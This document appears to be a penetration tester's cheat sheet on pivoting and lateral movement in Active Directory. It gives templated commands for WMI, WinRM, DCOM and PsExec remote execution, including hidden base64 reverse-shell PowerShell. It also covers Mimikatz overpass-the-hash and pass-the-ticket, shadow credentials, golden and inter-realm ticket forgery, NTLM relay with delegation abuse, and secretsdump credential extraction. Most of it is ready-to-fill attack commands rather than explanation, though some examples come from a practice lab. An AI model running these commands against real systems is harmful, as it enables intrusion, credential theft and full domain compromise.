Pivoting via Active Directory

Useful when we can’t install something like ligolo and pivot to compromise an internal machine

Service Pivoting

Windows Management Instrumentation

• Facilitates task automation via creating processes
• Uses Remote Procedure Calls (RPC) over 135 for remote access
• Abusing wmic (recently deprecated, but still probably good) on DMZ
  • wmic /node:{target_IP} /user:{domain_user} /password:{password} process call create "{process}"
  • To use with powershell, we need to turn the password into a secure string and pass a reverse shell:

$username = '{domain_user}';
$password = '{password}';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

$Options = New-CimSessionOption -Protocol DCOM
$Session = New-Cimsession -ComputerName {target_IP} -Credential $credential -SessionOption $Options

$Command = 'powershell -nop -w hidden -e {reverse_shell_powershell_b64}';

Invoke-CimMethod -CimSession $Session -ClassName Win32_Process -MethodName Create -Arguments @{CommandLine =$Command};

WinRM

• Communicates over 5986 and 5985 with XML via HTTP/HTTPS
• Use with winrs -r:{target_dnshostname} -u:{domain_user} -p:{password} "cmd /c {command}" or winrs -r:{target_dnshostname} -u:{domain_user} -p:{password} "powershell -nop -w hidden -e {reverse_shell_powershell_base64}"
• Can also be done via powershell

DCOM

• Good for lateral movement
• Exploits the Distributed Component Object Model (DCOM)
  • Used for creating software components that interact with each other
  • Local administrator access required
• Lateral movement attacks documented by cybereason
• Performed using built-in CreateInstance
  • $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1","{target_IP}"))
  • $dcom.Document.ActiveView.ExecuteShellCommand("powershell",$null,"{powershell -nop -w hidden -e {reverse_shell_powershell_base64}}","7")

$username = '{domain_user}';
$password = '{password}';
$secureString = ConvertTo-SecureString $password -AsPlaintext -Force;
$credential = New-Object System.Management.Automation.PSCredential $username, $secureString;

New-PSSession -ComputerName {target} -Credential $credential
Enter-PSSession {PSSession_ID_returned}

PsExec

• Tool used to replace telnet-like applications and provide remote execution of processes
• From PsTools
• Requires:
  • Local Administrator
  • ADMIN$ share available (on by default)
  • File and Printer sharing (on by default)
• ./PsExec64.exe -i \\{dnshostname} -u {domain}\{domain_user} -p {password} cmd

SMB

• Domain trusts can be abused to view internal SMB shares
  • net view //{dnshostname_or_IP} /all

NTLM/Kerberos Pivoting

Overpass the Hash

• Use an NTLM user hash to gain a full Kerberos TGT to get a TGS
• Assumes we own a server that has a domain user’s hash
• This can act as RunAs but for a domain user’s hash
• Performed using Mimikatz
  • sekurlsa::pth /user:{domain_user} /domain:{domain} /ntlm:{compromised_hash} /run:powershell
• To get a Kerberos ticket, we run something in the new powershell window
  • net use \\files04
• Once we have the ticket, we can just use PsExec to run commands on the remote systems using the compromised user
  • PsExec.exe \\{dnshostname} powershell
  • This only worked as the ACTUAL Administrator local user, not just an administrative user
    • Need to be able to write to C:\Windows
    • We can just change the local Administrator user if we have an administrative user

Pass the Ticket

• TGTs only work on the machine they’re created for, whereas TGSs offer flexibility
• Export current in-memory tickets with sekurlsa::tickets /export
  • This exports all tickets in .kirbi format in the same file directory, ls to find the ticket names (among other info)
  • We can then pick the desired ticket by passing the ticket name
    • kerberos::ptt {ticket_name}
  • If using these to access file shares, running something like ls \\web04\ will just give an error. Type ls \\web04\ and press tab (or just Find-DomainShare with PowerView)
• Rubeus
  • Compiled binary
  • Dumping and using tickets is one of Rubeus’s strong suits
  • Rubeus.exe triage to list available tickets

Shadow Credentials

• Seems certipy is the go-to here: certipy shadow -u "{user}@{domain}" -p {password} -dc-ip {dc_ip} -account '{target_user}' auto
• If we have GenericWrite over a user from a group
  • If we need to add ourselves or a user to the group first via GenericAll, we can use net on kali
    • net rpc group addmem '{target_group}' {user_to_add} -U '{domain}/{owned_user}%{password} -S '{dc_fqdn}'
  • We can then use pywhisker to add shadow credentials to the user
    • pywhisker -d "{domain}" -u "{owned_user}" -p "{owned_user_password}" --target "{target_user}" --action "add" --dc-ip {dc-ip} -f {filename} --pfx-password '{pfx_file_password}'
    • This gives us a pfx file for the user and a password for the pfx file
  • Then, we use the pfx file with gettgtpkinit to get a ccache kerberos TGT
    • gettgtpkinit.py -cert-pfx {pfx_file} "{domain}/{target_user}" {user}.ccache -pfx-pass '{pfx_pass}' -dc-ip {dc_ip}
    • We could also use certipy, which gives us the user’s NTLM hash as well
      • certipy auth -pfx {pfx_file} -dc-ip {dc-ip} -domain {domain_name} -username {target_user}
        • Add -no-save if we don’t want the ccache file

Abusing Domain Trusts

• Remember here that since we’re using kerberos we have to use DNS instead of IPs
• Gettind SIDs
  • Domain SIDs are often needed for tickets, so we use impacket’s lookupsid.py
    • lookupsid.py -domain-sids {domain_user_domain}/{domain_user}:{password}@{target_dc_IP} 0
• Golden ticket using child domain
  • If a parent domain trusts us as a child domain, we can use this to create a golden ticket with SIDs in the ticket’s Privilege Attribute Certificate (PAC)
  • ticketer.py can use krbtgt’s nthash to create a golden ticket
    • ticketer.py -nthash {child_krbtgt_nthash} -domain {child_domain} -domain-sid {child_domain_sid} -extra-sid {parent_domain_sid}-519 fakeuser
      • To get the parent domain’s sid, we can use Get-ADDomain -Identity {domain_name}
      • To use the ticket, we may need to save it with export KRB5CCName={path_to_ticket}, but I think impacket will recognize it in our directory for the specified user
    • We can then use the ticket to secretsdump or psexec
      • secretsdump.py -k -no-pass {child_domain}/fakeuser@{parent_domain_machine_name}
      • This works because we’ve forged a TGT that was valid for our child domain with the parent domain listed as an additional SID on the ticket, we can directly authenticate and access resources
• Forging inter-realm TGT and getting a service ticket
  • We can also extract the trust key and use it to create our own TGT
  • ticketer.py -nthash {DOMAIN$_NTLM_trust_hash} -domain {child_domain} -domain-sid {child_domain_sid} -extra-sid {parent_domain_sid}-519 -spn krbtgt/{parent_domain_name} fakeuser
    • The domain NTLM trust hash will look like SEVENKINGDOMS$:1104:{hash}:::
    • Then, export the ticket to be used for kerberos auth with export KRB5CCName={path_to_ticket}
  • We can then use this TGT to request a service ticket using getST.py
    • getST.py -k -no-pass -spn {spn}/{parent_domain_computer_name} '{parent_domain}/fakeuser@{parent_domain}' -debug
      • The spn value can be many different things, depending on what service we’d like to request:
        • HOST for general host access, CIFS for SMB, LDAP for ldap, GC for Global Catalog, RPCSS for RPC, MSSQLSvc for MSSQL, HTTP for web, WSMAN for PowerShell remoting
    • Since this is an interrealm service-key, it doesn’t provide access to services yet, so we can use it to request one of the above services from the DC
  • We then export this new ST, and we can use it to authenticate directly to the parent domain controller
    • secretsdump.py -k -no-pass fakeuser@kingslanding.sevenkingdoms.local
      • This would require a cifs/ service ticket, as dumping secrets is done through SMB

Delegation

• Resource-based Constrained Delegation (RBCD) is basically allowing one entity to perform some action on behalf of another user
• It’s very useful for giving granular permissions, for example if a service user needs to access only some resources on behalf of another user
• Alice delegating to Bob means that Bob can request Kerberos tickets and access services on behalf of Alice

Abusing Delegation to a Machine We Control

• ntlmrelayx supports providing delegation to our owned computer accounts with --delegate-access
  • This means that the target computer will delegate to our newly-created computer
• An example attack path:
  • Coerce a computer to authenticate to us (or gather relayable credentials in some manner):
    • coercer coerce -l {our_IP} -t {target_IP} --always-continue -u {username} -p {password}
  • Set up ntlmrelayx to add a computer to the domain using the relayed credentials which the coerced machine has delegation rights over:
    • ntlmrelayx.py -t ldaps://{dc_IP} -smb2support --remove-mic --add-computer {new_computer_name} --delegate-access
  • Use new computer to request a TGS from the machine’s Administrator via our new delegation
    • getST.py -spn HOST/{target_machine_name}.{domain} -impersonate Administrator -dc-ip {dc_ip} '{domain}/{new_computer_name}:{new_computer_pass}'
  • Use the valid TGS to extract secrets from the target machine:
    • export KRB5CCNAME=./Administrator.ccache; secretsdump.py -k -no-pass {domain}/Administrator@{target_ip}

Credential Harvesting

Getting More Credentials

• vault::cred /patch will enumerate vault credentials (creds used in scheduled tasks)